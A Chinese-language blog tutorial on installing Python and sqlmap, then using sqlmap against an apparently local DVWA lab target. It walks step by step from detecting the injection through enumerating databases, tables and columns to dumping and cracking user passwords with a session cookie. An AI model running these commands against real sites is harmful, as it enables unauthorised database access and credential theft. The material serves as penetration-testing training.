投稿
  1. hack之路首页
  2. web渗透测试

SQLMAP安装教程与利用SQL注入—Hack之路

web渗透测试, 零基础专区

SQLMAP安装
SQLMAP安装之前,首先需要安装PYTHON环境,这里安装的2.7版本的python,下载地址:https://www.python.org/ftp/python/2.7.1/python-2.7.1.amd64.msi,安装第一步:下载之后选择第一个选项,然后直接点安装,有取消钩的选项都要点上钩,然后安装
SQLMAP安装教程与利用SQL注入---Hack之路 SQLMAP安装教程与利用SQL注入---Hack之路
直接没有修改的路径会直接安装到C:\Python27,在cmd命令里输入python如果可以查询到python版本即是安装完成的
下面安装SQLMAP,首先下载程序,在SQLMAP官网上下载链接:https://github.com/sqlmapproject/sqlmap/tarball/master,下载成功之后会是一个压缩包,我们帮压缩包解压到python目录,并在桌面创建一个cmd的快捷方式,属性设置为SQLMAP的路径
SQLMAP安装教程与利用SQL注入---Hack之路    SQLMAP安装教程与利用SQL注入---Hack之路   SQLMAP安装教程与利用SQL注入---Hack之路
点击进去之后输入命令,sqlmap.py,如果可运行即安装完成
SQLMAP安装教程与利用SQL注入---Hack之路

SQLMAP的利用
1.判断是否存在注入点
  假设目标注入点是:http://192.168.0.106/vulnerabilities/sqli/?id=1,判断其是否存在注入的命令如下所示
SQLMAP测试注入(需要登录才能注入的需要带正确的cookie)
目标网址:http://192.168.0.106/vulnerabilities/sqli/?id=1&Submit=Submit#
查询是否可以注入(执行命令):sqlmap.py -u “http://192.168.0.106/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie “PHPSESSID=asa01pg7l1h70v1v00h2aktu44;security=low”
SQLMAP安装教程与利用SQL注入---Hack之路
如果出现SQL版本和数据库类型便可以注入
查询有哪些数据库:sqlmap.py -u “http://192.168.0.106/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie “PHPSESSID=asa01pg7l1h70v1v00h2aktu44;security=low” –dbs
SQLMAP安装教程与利用SQL注入---Hack之路
查询当前数据库:sqlmap.py -u “http://192.168.0.106/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie “PHPSESSID=asa01pg7l1h70v1v00h2aktu44;security=low” –current-db
SQLMAP安装教程与利用SQL注入---Hack之路
查询当前数据库的表名:sqlmap.py -u “http://192.168.0.106/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie “PHPSESSID=asa01pg7l1h70v1v00h2aktu44;security=low” -D root –tables
SQLMAP安装教程与利用SQL注入---Hack之路
查询重要数据表的所有列名:sqlmap.py -u “http://192.168.0.106/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie “PHPSESSID=asa01pg7l1h70v1v00h2aktu44;security=low” -T users –columns
SQLMAP安装教程与利用SQL注入---Hack之路
查询个别重要列名(users,passwrod)的数据:sqlmap.py -u “http://192.168.0.106/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie “PHPSESSID=asa01pg7l1h70v1v00h2aktu44;security=low” -T users -C password,user -dump
SQLMAP安装教程与利用SQL注入---Hack之路
查询完毕!一直按回车自动解密MD5

自动化注入还是挺省心的

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/09/21/sqlmap%e5%ae%89%e8%a3%85%e6%95%99%e7%a8%8b%e4%b8%8e%e5%88%a9%e7%94%a8sql%e6%b3%a8%e5%85%a5-hack%e4%b9%8b%e8%b7%af/

(0)
打赏 微信扫一扫 微信扫一扫
0 0
上一篇 2020年9月21日 am12:38
下一篇 2020年9月21日 am6:51

相关推荐

  • discuz ml RCE漏洞分析

    0x00概述 7月11日,在网上发现discuz ml(多国语言版)出现RCE突破的消息,突破在于cookie的语言可控并且没有严格过滤,导致可以远程执行代码。 0x01影响范围 …

    2020年12月15日 web渗透测试

  • 致远OA 文件上传漏洞

      0x01漏洞简述 2021年01月08日,360CERT监测发现致远OA发布了致远OA的风险通告,漏洞等级:严重,漏洞评分:9.8。 致远OA旧版本某些接口存在未授权访问,攻击…

    web常规漏洞 2021年1月10日
  • 关于PHP编码安全---Hack之路 web常规漏洞

    关于PHP编码安全—Hack之路

    关于PHP编码安全 弱数据类安全    由于PHP的弱数据特性,早就了PHP的易学和易用。PHP在使用双等于号的时候(==),不会严格检验传入的变量类型,同时在执行的过程中可以将变…

    2020年9月11日
  • Webshell免杀的一些思考 web常规漏洞

    Webshell免杀的一些思考

    最近看了很多关于webshell的文章,真的是觉得受益匪浅。于是产生想写一篇属于自己文章的想法,本文很多地方加入了自己的思考,并且干货满满。希望大家可以关注我的专栏。 既然我们要研…

    2021年1月11日
  • SQL注入修复建议---Hack之路 PHP代码审计

    SQL注入修复建议—Hack之路

    SQL注入漏洞防护    SQL注入是最危险的漏洞之一 ,但也是最好防护的漏洞之一。本文章将介绍在PHP的编码中合理的使用MySQL提供的预编译进行SQL注入防护,在PHP中使用P…

    2020年9月24日

  • FortiWeb 多个高危漏洞安全通告

      0x01事件简述 2021年01月07日,360CERT监测发现FortiWeb发布了FortiWeb 多个高危漏洞的风险通告,漏洞编号有CVE-2020-29015,CVE-…

    web常规漏洞 2021年1月10日

发表评论

邮箱地址不会被公开。 必填项已用*标注

记住昵称、邮箱和网址,下次评论免输入